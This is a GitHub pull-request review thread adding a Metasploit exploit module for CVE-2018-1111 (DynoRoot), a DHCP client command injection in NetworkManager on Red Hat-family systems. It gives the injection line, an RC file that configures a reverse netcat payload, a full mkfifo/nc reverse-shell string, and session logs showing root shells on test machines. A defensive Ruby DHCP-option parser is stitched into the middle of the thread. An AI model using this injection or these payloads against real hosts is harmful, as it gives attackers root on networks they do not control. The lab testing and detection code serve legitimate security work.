Add CVE-2018-1111 exploit #10059

Merged
merged 14 commits into from
Jun 12, 2018
Conversation

kkirsche
Contributor

@kkirsche kkirsche commented May 18, 2018

Verification

  • Set up a CentOS virtual machine and a Kali virtual machine
  • Ensure proper versions are in use. This was tested on CentOS Linux release 7.4.1708 (Core) with NetworkManager version 1.8.0-11.el7_4
  • Create isolated custom network (e.g. 192.168.41.0/24)
  • Disable DHCP server on custom network for easier verification
  • Start msfconsole on Kali Linux
  • use exploit/unix/dhcp/rhel_dhcp_client_command_injection
  • Configure SRVHOST and NETMASK required variables
  • Configure PAYLOAD and supporting options
  • Start the DHCP server
  • On CentOS 7 machine, request a new DHCP address. Assuming primary interface is ens33, you can use: clear && nmcli conn down id "ens33" && nmcli conn up id "ens33" && ip addr show
  • This should request a new DHCP lease from your server (if other DHCP servers exist, note that this then becomes a race condition, often requiring DHCP NAKs to get your DHCP server to win)

Not included :(

  • Document the thing and how it works (Example)

Validated using RC File:

```
use exploit/unix/dhcp/rhel_dhcp_client_command_injection
set SRVHOST 192.168.41.129
set NETMASK 255.255.255.0
set PAYLOAD cmd/unix/reverse_netcat
set LHOST 192.168.41.2
set LPORT 1337
exploit -j -z
```

def initialize(info = {})
super(update_info(info,
'Name' => 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q|
Contributor

I believe curly braces are the standard for msf modules.

%q{ }

Contributor Author

Changed / fixed

# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
Contributor

require 'msf/core' shouldn't be necessary

Contributor Author

Removed. This should fix the test

```
modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb - [WARNING] Explicitly requiring/loading msf/core is not necessary
```

removes `require msf/core`
@bcoles
Contributor

bcoles commented May 18, 2018

Build failed due to:

```
0.17s$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb - [WARNING] Explicitly requiring/loading msf/core is not necessary
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
```

@@ -0,0 +1,75 @@
##
# This module requires Metasploit: http://metasploit.com/download
Contributor

https

Contributor Author

Fixed, good eye!

# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/dhcp'
Contributor

Already required in the mixin.

Contributor Author

Removed. Good catch!

def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #")
Contributor

Feels like you'd have some badchars from the injection. Would be worthwhile to perform badchar analysis and then update BadChars.

Contributor Author

Do you have any suggestions for how to perform that analysis? Unlike a buffer overflow where I can investigate the registers, I don't have a good sense of how I'd do that with a command injection like this

Contributor

I'd start by looking at my injection and eliminating as many shell metacharacters or otherwise "breaking" characters as I can.

Then I'd encode away the remaining ones, escape them, quote them, comment them out, or match them. Then I'd verify with strace, ltrace, etc.

It really depends on the vuln, the environment, and the payload. Hope this helps.

Contributor

I didn't dig into this vuln deeply yet, but judging by the injection used here, you shouldn't have to worry about too many badchars.

Appears a string is being completed (matched quotes), previous command backgrounded, payload injected, and everything else commented out. It's a tried-and-true technique.

You can probably randomize the x.

Contributor

Another thing to watch out for is if you have badchars in the protocol or otherwise over the wire. Sometimes your injection can look solid from the software side but get messed up on the networking side.

Lastly, you may want to account for software or network protections. Something like a WAF would have to be evaded. I don't think that's much of a concern here.

Contributor

Good bot.

Contributor Author

Added a randomization on the x here

Contributor

It's almost certainly not capped at one byte either. Might want to use a longer random-length random string.

Contributor

@bcoles bcoles May 18, 2018

I was under the impression that Space was of concern here.

Edit Apparently space is no longer a concern, in which case: Rex::Text.rand_text_alpha(6..12) to generate 6 to 12 random alpha characters.

Contributor Author

```
mzdPvddRUFMT'&mkfifo /tmp/klgcql; nc 192.168.41.128 1337 0</tmp/klgcql | /bin/sh >/tmp/klgcql 2>&1; rm /tmp/klgcql  #
```

A few different manual tests I've been doing to see if some shell functionality does or doesn't work:

```
set CMD cat /etc/passwd | cut -d ':' -f 1 > /tmp/test && cat /tmp/test | cut -d '-' -f 1 > /tmp/test2
set CMD "for i in $(seq -s ' ' 1 255); do ping -c 1 \"192.168.41.${i}\" 2>&1; done > /tmp/pingsweep"
```

Worked and felt relatively contrived in their design, trying to hit many different types of command characters

@wvu wvu self-assigned this May 18, 2018
'Payload' =>
{
# 255 for a domain name, minus some room for encoding
'Space' => 200,
Contributor

I'd have to check the RFC(s), but does this still apply to options?

Contributor Author

Based on RFC2132, seems like it does not.

Options may be fixed length or variable length. All options begin with a tag octet, which uniquely identifies the option. Fixed-length options without data consist of only a tag octet. Only options 0 and 255 are fixed length. All other options are variable-length with a length octet following the tag octet. The value of the length octet does not include the two octets specifying the tag and length. The length octet is followed by "length" octets of data. Options containing NVT ASCII data SHOULD NOT include a trailing NULL; however, the receiver of such options MUST be prepared to delete trailing nulls if they exist. The receiver MUST NOT require that a trailing null be included in the data. In the case of some variable-length options the length field is a constant but must still be specified.

https://tools.ietf.org/html/rfc2132

Contributor

Cool, didn't think so. Phew!

# 255 for a domain name, minus some room for encoding
'Space' => 200,
'DisableNops' => true,
'Compat' =>
Contributor

I'd remove this hash altogether. cmd for PayloadType already includes most, and you're not specifying RequiredCmd. And this vuln isn't targeting an appliance or anything where the environment is known, so we shouldn't need to limit ourselves.

Contributor Author

Removed this for PayloadType cmd instead

'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'References' =>
Contributor

Feel free to include your own PoC in this array. :)

Contributor

I'd add an AKA reference for DynoRoot, too.

Contributor Author

Added

'DisclosureDate' => 'May 15 2018'
))

deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
Contributor

Might be more to deregister here, such as any PXE options.

Contributor Author

I'll remove FILENAME related to PXE, don't know that any of the others like DHCPIP start and end, BROADCAST, ROUTER, etc. are related to PXE

Contributor Author

Removed FILENAME, others didn't seem like they were related to PXE in show options or show advanced

Contributor

Cool, thanks.

'PayloadType': 'cmd',
'Payload' =>
{
'DisableNops' => true,
Contributor

Speaking of space, I'm pretty sure this doesn't apply. Nothing to pad with NOPs. This thing doesn't even need NOPs.

Contributor Author

Removed

@kkirsche
Contributor Author

So as a heads up, this does generate a malformed packet, but it's malformed without the change to how we build the packet in the server.rb file. The question I'd have is should fixing the DHCP server to not generate malformed packets really be something that's included in this PR or should that be potentially broken out as a separate PR / review process?

@kkirsche
Contributor Author

kkirsche commented May 19, 2018

Found the issue actually. DOMAINNAME is included in the packet even though we don't generate it. Thus, it's an invalid packet since the option isn't correct. Adding an if makes this a valid packet.

Valid packet with the if statement:
[screenshot: valid packet]

Invalid packet without it (you'll notice the OpEnd / padding is instead being picked up as the option, which is incorrect):
[screenshot: invalid packet]
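The RFC 2132 excerpt quoted earlier in this thread, the malformed packet described in this comment (a domain-name option emitted with no value, so the End/padding octets get read as the option), and the earlier bad-character discussion all come down to how the DHCP option field is encoded and what a receiver tolerates. The following is an added example, not code from this pull request or from the Metasploit module under review: a small Ruby parser for the option field that encodes options as tag/length/value, strips the trailing NULs a receiver must tolerate, reports malformed encodings, and flags text options (host-name, domain-name and the 252 proxy-auto-discovery tag) whose value carries shell metacharacters, which is the detection-side counterpart of the "close the quote, separate the command, comment the rest out" shape the reviewers describe. The sample option fields are constructed here, and `encode_option`, `parse_dhcp_options` and `suspicious_options` are this example's own names.

```ruby
# Added example: an RFC 2132 option-field parser with a metacharacter check.
# Not part of the Metasploit module or of this pull request.

PAD_TAG = 0     # single-octet option, no length field
END_TAG = 255   # single-octet option, terminates the option field

# NVT ASCII options this example treats as text. Tag 252 is the de facto
# WPAD / proxy-auto-discovery option that the thread's injection rides on.
TEXT_TAGS = { 12 => 'host-name', 15 => 'domain-name', 252 => 'proxy-auto-discovery' }.freeze

# Characters that never belong in a host name, domain name or WPAD URL
# and that a shell would interpret when the value is expanded unquoted.
SHELL_META = /['"`$|&;<>(){}\\#]/

# Encode one variable-length option as tag, length, value (RFC 2132 section 2).
def encode_option(tag, value)
  raise ArgumentError, "option #{tag} value longer than 255 octets" if value.bytesize > 255
  [tag, value.bytesize].pack('CC') + value.b
end

# Parse the option field (everything after the 4-byte magic cookie).
# Returns { options: [[tag, value], ...], errors: [String, ...] }.
def parse_dhcp_options(buf)
  buf = buf.b
  options = []
  errors = []
  i = 0
  while i < buf.bytesize
    tag = buf.getbyte(i)
    if tag == PAD_TAG
      i += 1
      next
    end
    return { options: options, errors: errors } if tag == END_TAG
    if i + 1 >= buf.bytesize
      errors << "option #{tag}: no length octet before end of buffer"
      return { options: options, errors: errors }
    end
    len = buf.getbyte(i + 1)
    remaining = buf.bytesize - (i + 2)
    if len > remaining
      # This is what a tag written without its length/value looks like: the
      # following End octet (255) is consumed as the length and nothing fits.
      errors << "option #{tag}: declared length #{len} exceeds remaining #{remaining} octets"
      return { options: options, errors: errors }
    end
    value = buf.byteslice(i + 2, len)
    if TEXT_TAGS.key?(tag)
      errors << "option #{tag} (#{TEXT_TAGS[tag]}): empty value" if len.zero?
      value = value.sub(/\x00+\z/, '') # receivers MUST tolerate trailing NULs
    end
    options << [tag, value]
    i += 2 + len
  end
  errors << 'no End option (255) found'
  { options: options, errors: errors }
end

# Text options whose value contains a shell metacharacter.
def suspicious_options(options)
  options.select { |tag, value| TEXT_TAGS.key?(tag) && value.match?(SHELL_META) }
end

# --- constructed sample option fields (no BOOTP header, no magic cookie) ---

# Well-formed: DHCPOFFER, server id, host-name with a trailing NUL, WPAD URL, End, padding.
def sample_valid
  encode_option(53, "\x02") +
    encode_option(54, [192, 0, 2, 1].pack('C4')) +
    encode_option(12, "ws01\x00") +
    encode_option(252, 'http://wpad.example.test/wpad.dat') +
    [END_TAG].pack('C') + ([PAD_TAG] * 4).pack('C*')
end

# Mimics the bug described in the thread: a domain-name tag (15) written with
# neither length nor value, so the End octet is read as its length.
def sample_malformed
  encode_option(53, "\x02") + [15].pack('C') + [END_TAG].pack('C')
end

# A harmless stand-in for an injected value: quote closed, command separator,
# a no-op command, rest of the line commented out.
def sample_injected
  encode_option(53, "\x02") + encode_option(252, "RaNdOm'&true #") + [END_TAG].pack('C')
end

if __FILE__ == $PROGRAM_NAME
  { valid: sample_valid, malformed: sample_malformed, injected: sample_injected }.each do |name, pkt|
    r = parse_dhcp_options(pkt)
    puts "#{name}: #{r[:options].size} options, errors=#{r[:errors].inspect}, " \
         "suspicious=#{suspicious_options(r[:options]).map(&:first).inspect}"
  end
end
```

Run it directly to print one summary line per sample. To use it on a real capture you would first skip the fixed BOOTP header and the magic cookie and hand only the option field to `parse_dhcp_options`. The metacharacter check is deliberately blunt: a legitimate WPAD URL with a query string containing `&` would trip it, so on a production sensor you would pair it with an allow-list of expected values rather than alert on the regex alone.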

@kkirsche
Contributor Author

Let me know how this looks @wvu-r7 or if you'd like more extensive bad char testing than simply working through some of the main shell control characters (e.g. |, &, &&, shell expansion, shell redirection [<, >, >>], etc.)

['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'PayloadType': 'cmd',
Contributor

This should be a hash rocket for consistency

'PayloadType' => 'cmd',

Contributor Author

Fixed

],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
Contributor

You can add a 'Privileged' => true, key to this hash somewhere, to show off that your exploit gives remote r00t.

Contributor Author

Fixed

@bcoles
Contributor

bcoles commented May 19, 2018

The module worked for me on Fedora 27 (x64) (nm version 2.29-6.fc27).

```
msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > sessions -i 36
[*] Starting interaction with 36...

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

uname -a
Linux localhost.localdomain 4.13.9-300.fc27.x86_64 #1 SMP Mon Oct 23 13:41:58 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME=Fedora
VERSION="27 (Workstation Edition)"
ID=fedora
VERSION_ID=27
PRETTY_NAME="Fedora 27 (Workstation Edition)"
ANSI_COLOR="0;34"
CPE_NAME="cpe:/o:fedoraproject:fedora:27"
HOME_URL="https://fedoraproject.org/"
SUPPORT_URL="https://fedoraproject.org/wiki/Communicating_and_getting_help"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=27
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=27
PRIVACY_POLICY_URL="https://fedoraproject.org/wiki/Legal:PrivacyPolicy"
VARIANT="Workstation Edition"
VARIANT_ID=workstation
```

@bcoles
Contributor

bcoles commented May 19, 2018

The module worked for me on CentOS 7 1708 (x64) (nm version 2.25.1-31.base.el7); however, it did not work with the default payload cmd/unix/reverse as the telnet executable was not present. The VM is in a fairly clean state and I'm fairly certain I haven't removed telnet.

I used the cmd/unix/reverse_perl, cmd/unix/reverse_awk, cmd/unix/reverse_openssl, cmd/unix/reverse_netcat and cmd/unix/reverse_bash payloads with success.

```
msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > [*] Command shell session 1 opened (10.1.1.197:4444 -> 10.1.1.6:53208) at 2018-05-19 17:08:08 -0400

msf5 exploit(unix/dhcp/rhel_dhcp_client_command_injection) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

which telnet
which: no telnet in (/bin:/usr/bin:/sbin)

locate telnet
/etc/selinux/targeted/active/modules/100/telnet
/etc/selinux/targeted/active/modules/100/telnet/cil
/etc/selinux/targeted/active/modules/100/telnet/hll
/etc/selinux/targeted/active/modules/100/telnet/lang_ext
/usr/include/arpa/telnet.h
/usr/lib/firewalld/services/telnet.xml
/usr/lib64/python2.7/telnetlib.py
/usr/lib64/python2.7/telnetlib.pyc
/usr/lib64/python2.7/telnetlib.pyo
/usr/share/ruby/net/telnet.rb

^Z
Background session 1? [y/N]  y
```

I also tried on CentOS 6.5 (x64) (nm version 2.20.51.0.2-5.36-el6 20100205). An IP address was allocated correctly, however I was unable to get a session.

@wvu
Contributor

wvu commented May 19, 2018

@kkirsche: You've done an awesome job already. I think this will be good to go come Monday. Thanks!

@bcoles
Contributor

bcoles commented May 19, 2018

RHEL 6.6 (x64) (nm version 2.20.51.02-5.42.el6 20100205) received an IP address from DHCP server, but wasn't able to get a session.

RHEL 7 Server (x64) (nm version 2.23.52.0.1-16.el7 20130226) received an IP address from DHCP server, but wasn't able to get a session.

Tested using cmd/unix/reverse_perl payload, as telnet executable was not present. I didn't investigate thoroughly.

@kkirsche
Contributor Author

kkirsche commented May 21, 2018

Telnet is not included in CentOS 6.9 with a default installation and does not seem to accept the injection regardless of option or basic modifications such as changing the ' to ", changing ' to `\x27', etc. Looking at it through ltrace you can see it picking up the option just not acting on it.

root@kali:~# grep -rni 'nc 192' -A 15 -B 15 trace.txt 
2861-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2862-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2863-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2864-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2865-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2866-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2867-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2868-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
2869-strncasecmp(0x7effa0771610, 0x7eff9eeab433, 8, 0, 0x7effa0771610)                                                               = 0
2870-strtol(0x7effa0771618, 0, 10, 3, 0)                                                                                             = 252
2871-strlen("unknown-252")                                                                                                           = 11
2872-malloc(44)                                                                                                                      = 0x7effa0773a40
2873-memset(0x7effa0773a40, '\000', 44)                                                                                              = 0x7effa0773a40
2874-memcpy(0x7effa0773a60, "unknown-252", 11)                                                                                       = 0x7effa0773a60
2875-free(0x7effa0771610)                                                                                                            = <void>
2876:memcpy(0x7ffc8ec1a850, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 110)                                                              = 0x7ffc8ec1a850
2877-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2878-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2879-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2880-malloc(117)                                                                                                                     = 0x7effa0773a80
2881-memset(0x7effa0773a80, '\000', 117)                                                                                             = 0x7effa0773a80
2882:memcpy(0x7effa0773a84, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 109)                                                              = 0x7effa0773a84
2883-malloc(64)                                                                                                                      = 0x7effa0773b00
2884-memset(0x7effa0773b00, '\000', 64)                                                                                              = 0x7effa0773b00
2885-malloc(136)                                                                                                                     = 0x7effa0773b50
2886-memset(0x7effa0773b50, '\000', 136)                                                                                             = 0x7effa0773b50
2887-malloc(16)                                                                                                                      = 0x7effa0771610
2888-memset(0x7effa0771610, '\000', 16)                                                                                              = 0x7effa0771610
2889-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2890-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2891-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2892-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2893-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2894-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2895-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2896-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
2897-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
--
4138-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4139-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4140-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4141-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4142-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4143-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4144-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4145-__ctype_tolower_loc()                                                                                                           = 0x7eff9ee176b0
4146-strncasecmp(0x7effa0774020, 0x7eff9eeab433, 8, 0, 0x7effa0774020)                                                               = 0
4147-strtol(0x7effa0774028, 0, 10, 3, 0)                                                                                             = 252
4148-strlen("unknown-252")                                                                                                           = 11
4149-malloc(44)                                                                                                                      = 0x7effa0774040
4150-memset(0x7effa0774040, '\000', 44)                                                                                              = 0x7effa0774040
4151-memcpy(0x7effa0774060, "unknown-252", 11)                                                                                       = 0x7effa0774060
4152-free(0x7effa0774020)                                                                                                            = <void>
4153:memcpy(0x7ffc8ec1a850, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 110)                                                              = 0x7ffc8ec1a850
4154-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4155-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4156-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4157-malloc(117)                                                                                                                     = 0x7effa0774080
4158-memset(0x7effa0774080, '\000', 117)                                                                                             = 0x7effa0774080
4159:memcpy(0x7effa0774084, "mD'&mkfifo /tmp/dkrslmx; nc 192."..., 109)                                                              = 0x7effa0774084
4160-malloc(64)                                                                                                                      = 0x7effa0774100
4161-memset(0x7effa0774100, '\000', 64)                                                                                              = 0x7effa0774100
4162-malloc(136)                                                                                                                     = 0x7effa0774150
4163-memset(0x7effa0774150, '\000', 136)                                                                                             = 0x7effa0774150
4164-malloc(16)                                                                                                                      = 0x7effa0774020
4165-memset(0x7effa0774020, '\000', 16)                                                                                              = 0x7effa0774020
4166-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4167-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4168-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4169-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4170-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4171-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4172-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4173-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0
4174-__ctype_b_loc()                                                                                                                 = 0x7eff9ee176a0

I do not have access to a RHEL to attempt any form of troubleshooting on that host.

@kkirsche
Contributor Author

Let me know how you'd like us to try handling this @wvu-r7

@kkirsche
Contributor Author

Wanted to follow up on this and see if more action is needed

@wvu
Contributor

wvu commented May 23, 2018

Ayy, I'm getting to it.

@kkirsche
Contributor Author

All good, not trying to rush you. Just wanted to make sure that you were not waiting for me on something. If that changes, just give a shout 👍

@wvu
Contributor

wvu commented May 23, 2018

Thanks! It looked pretty good at the end of last week.

@wvu wvu merged commit 93e9c96 into rapid7:master Jun 12, 2018
wvu added a commit that referenced this pull request Jun 12, 2018
@wvu
Contributor

wvu commented Jun 12, 2018

f4bb00b, 4dd7444

@wvu wvu removed the needs-docs label Jun 12, 2018
msjenkins-r7 pushed a commit that referenced this pull request Jun 12, 2018
@wvu
Contributor

wvu commented Jun 12, 2018

Release Notes

This adds an exploit for CVE-2018-1111 (aka "DynoRoot"), a command injection vulnerability against NetworkManager's DHCP client script on Red Hat, CentOS, and Fedora systems.

@kkirsche
Contributor Author

Thanks for your help reviewing and merging this. Appreciate it!

@wvu
Contributor

wvu commented Jun 12, 2018

So sorry for the delay, @kkirsche. Lots going on. I hope that you will contribute again!

@kkirsche
Contributor Author

No worries. I've had times like that and I'm sure I will again. Just appreciate getting to help out. You'll definitely see some more from me :)

@wvu
Contributor

wvu commented Jun 12, 2018

🙇

@kkirsche kkirsche deleted the cve-2018-1111 branch June 12, 2018 21:14
@wvu wvu mentioned this pull request Jun 13, 2018